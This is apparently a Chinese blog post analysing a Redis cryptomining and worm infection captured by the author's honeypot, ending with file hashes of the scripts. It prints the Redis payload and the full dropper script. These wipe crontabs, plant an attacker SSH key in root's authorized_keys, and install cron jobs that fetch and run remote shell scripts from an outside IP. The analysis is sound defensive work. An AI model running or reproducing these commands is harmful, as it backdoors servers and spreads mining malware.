Redis删库跑路加勒索?也有挖矿的呢

在9月10日我就发现我的蜜罐有个url的数量出现暴增(估计还可能因为我写递归提取下载地址的时候没有控制好),但是没空去分析,简单看了下是redis的6379端口的。(当然现在这个脚本已经下线了)

9月11日0点,阿里发了一个预警《预警| 删库跑路加勒索,Redis勒索事件爆发》,详细请看下面链接

https://media.weibo.cn/article?id=2309404282854916934109

我看了下我的蜜罐有没有http://103.224.80.52/butterfly.sh这个url,发现并没有,估计是因为我没有模拟redis服务,只是开放了6379端口

我这边抓到的payload是下面的,也是通过写入cron的方式

1
*3\r\n$3\r\nset\r\n$7\r\nbackup1\r\n$64\r\n\n\n\n*/2 * * * * curl -fsSL http://47.93.38.159:8080/ash.sh | sh\n\n\r\n

看看ash.sh脚本,主要是写入ssh公钥和写入cron和下载bsh.sh执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL http://47.93.38.159:8080/ash.sh|sh' > /var/spool/cron/root
echo '*/20 * * * * curl -fsSL http://47.93.38.159:8080/ash.sh|sh' > /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL http://47.93.38.159:8080/bsh.sh|bash' 2>/dev/null
service crond restart

bsh.sh就是常规的挖矿套路了

下载挖矿程序,并添加到开机自启动

最后安装iptables等软件,masscan扫描工具,下载rsh.sh并执行

最后看看rsh.sh,首先只允许本地连接6379端口,尝试ssh到之前连接过的主机执行下载ash.sh进行蠕虫式传播

还有利用之前的masscan进行内网扫描开放的6379端口进行蠕虫式传播

脚本sha256

fdc717003b665286792be8b95337b47b1066e1b44df90046baa9a8dbae7eab7c
bb33db427153eba06086013a677ec3fff195d3e75577e93938a3174e37e4fd9d
ab95a9e7a65ef7eea32e59834c12ce7e22f4d06422c916fdd6239648836eece5

1元也是爱,谢谢支持